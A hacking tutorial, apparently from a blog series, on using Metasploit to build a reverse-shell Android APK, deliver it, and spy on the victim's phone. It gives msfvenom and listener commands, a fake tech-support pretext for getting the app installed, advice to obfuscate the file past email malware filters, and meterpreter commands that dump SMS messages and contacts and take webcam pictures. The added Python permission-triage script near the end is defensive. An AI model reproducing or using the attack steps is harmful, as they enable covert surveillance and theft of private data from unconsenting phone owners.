Metasploit Basics, Part 13: Exploiting Android Mobile Devices

Welcome back, my budding hackers!

The growth of the mobile device market has been dramatic over the past 10 years. Since the market's birth in 2007 with the advent of the Apple phone, mobile devices have grown to comprise 52.3% of all web traffic in 2018. There are 4.5B mobile devices on the planet, or about one for 2/3 of the world's population. Of these mobile devices, 87.9% use the Android operating system. With this market dominance of Android, it is fitting that we focus our mobile hacking on this operating system.

In this tutorial, we will be using Metasploit to exploit Android devices such as tablets and phones. As you will see, once we have exploited the Android device, we are capable of collecting the target's text messages, contact list and location, and even turning on their webcam!

Step #1: Find Android Exploits

The first step is to search Metasploit for Android exploits.

There are numerous exploits within Metasploit for hacking Android. A quick search reveals the following exploits:

msf > search type:exploit platform:android

As you can see, there are at least 7 exploits for Android operating systems in Metasploit.

Step #2: Find Android Payloads

As you have seen in previous Metasploit Basics tutorials, Metasploit has numerous payloads and those payloads are specific to the operating system and exploit. If we want to exploit an Android system, then we will need an Android payload.

We can find Android-specific payloads by searching:

msf > search type:payload platform:android

As you can see, there are numerous Android-specific payloads, including payload/android/meterpreter/reverse_tcp, which we will be using here, but the others can be used as well.

Step #3: Build an APK file

One of the easiest ways to exploit an Android system is to create an .apk (Android PacKage) file and have the target install it on their Android phone or tablet. This is usually done through physical access to their phone or through social engineering ("Hello, this is tech support. We have detected unusual activity on your phone and need to install a tech support app to monitor this activity...", etc.).

As we learned here in Metasploit Basics, Part 9, we can use the msfvenom utility in Metasploit to create custom payloads. In this case, we will convert the payload/android/meterpreter/reverse_tcp into an Android .apk file.

To do so, enter the following command.

msf > msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=6996 R > AndroidMalware.apk

For more on how to use msfvenom to create custom payloads, see my tutorial here.

Step #4: Set Up a Multi Handler Listener

Now that we have the .apk built with the Android payload embedded, we need to open a listener on our system to accept the connection from the AndroidMalware.apk when it is installed and executed. In Metasploit Basics, Part 12, we set up an .rc script to automatically start and open a listener to accept outside connections to our Metasploit. If you did so, you can now start it by entering:

msf > resource handler_http.rc

If you don't have a listener script, you can start a listener by entering the following commands:

msf > use exploit/multi/handler

msf > set PAYLOAD android/meterpreter/reverse_tcp

msf > set LHOST

msf > set LPORT 6996

msf > exploit

You must make certain that the PAYLOAD, LPORT and LHOST are the same as those you used in creating your .apk file in msfvenom.

Step #5: Deliver the AndroidMalware.apk to the Target

The next step, of course, is to deliver the .apk file to the target's mobile device. If you have physical access to the device, simply install the AndroidMalware.apk. Otherwise, you will need to send it to the target via email or Dropbox or other means. It's important to note that this file will likely be flagged by Gmail and other email services as malware. As a result, consider re-encoding the payload with OWASP-ZSC or other obfuscation software such as Shellter or Veil-Evasion.

In addition, you might consider hosting the .apk on your own website and encouraging people to download it.

Step #6: Exploiting the Target System

Once the target installs the .apk, we should get a meterpreter prompt like below. We can then enter the command sysinfo to verify we are on the Android device!

meterpreter > sysinfo

We can then enter help to see all the Android meterpreter commands.

meterpreter > help

Note that from the Android meterpreter we have unique options such as:






These commands give us the power to see just about anything the target is doing on this device, as well as to find their location. This meterpreter is also capable of using some of the other standard meterpreter commands such as:




Step #7: Gathering Data from the Android Device

Let's start by getting the target's text messages.

meterpreter > dump_sms

Now, let's get their contacts list.

meterpreter > dump_contacts

Finally, let's try listing their webcams so that we can later snap pictures from them.

meterpreter > webcam_list

Now that we have the list of webcams on the device, we can use the meterpreter command webcam_snap followed by the number of the webcam to take pictures of the target from the back camera.

meterpreter > webcam_snap 1
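
Everything collected in this step depends on Android permissions the installed .apk had to request. The following is an added example, not part of the original tutorial or of Metasploit: a triage check over the text printed by aapt dump permissions that flags an app combining network access with the SMS, contacts, camera and location permissions used above. The permission mapping, the threshold and both sample outputs are assumptions constructed for illustration.

```python
import re

# Assumed mapping from the data gathered on this page to the standard
# Android permissions an app needs in order to read it.
CAPABILITY_PERMS = {
    "dump_sms": {"android.permission.READ_SMS"},
    "dump_contacts": {"android.permission.READ_CONTACTS"},
    "webcam_snap": {"android.permission.CAMERA"},
    "location": {"android.permission.ACCESS_FINE_LOCATION",
                 "android.permission.ACCESS_COARSE_LOCATION"},
}
NETWORK = "android.permission.INTERNET"
# Default package name of an unmodified msfvenom Android payload.
KNOWN_STAGER_PACKAGE = "com.metasploit.stage"
# Accepts both "uses-permission: X" and "uses-permission: name='X'" lines.
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=')?([\w.]+)'?", re.M)
PKG_RE = re.compile(r"^package:\s*(?:name=')?([\w.]+)", re.M)

# Constructed sample output, not captured from a real APK.
SAMPLE_SUPPORT_APP = """package: com.example.techsupport
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""
SAMPLE_FLASHLIGHT = """package: com.example.flashlight
uses-permission: name='android.permission.CAMERA'
"""

def triage(aapt_output, threshold=3):
    """Return a verdict dict for the text of `aapt dump permissions`."""
    perms = set(PERM_RE.findall(aapt_output))
    pkg = PKG_RE.search(aapt_output)
    package = pkg.group(1) if pkg else None
    enabled = sorted(cap for cap, needed in CAPABILITY_PERMS.items()
                     if perms & needed)
    reasons = []
    if package == KNOWN_STAGER_PACKAGE:
        reasons.append("default Metasploit stager package name")
    if NETWORK in perms and len(enabled) >= threshold:
        reasons.append("network access plus " + ", ".join(enabled))
    return {"package": package, "capabilities": enabled,
            "suspicious": bool(reasons), "reasons": reasons}

if __name__ == "__main__":
    for sample in (SAMPLE_SUPPORT_APP, SAMPLE_FLASHLIGHT):
        print(triage(sample))
```

A renamed package defeats the name check, so the permission combination is the more durable signal; legitimate apps can also trip it, which is why the result is a triage flag and not a verdict.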


The world's most widely used hacking/pentesting platform, Metasploit, has capabilities to exploit just about any system, including Android mobile devices. We can create a malicious .apk file and, when the target installs the app, we can get almost totally unfettered access to their text messages, contacts and webcams!
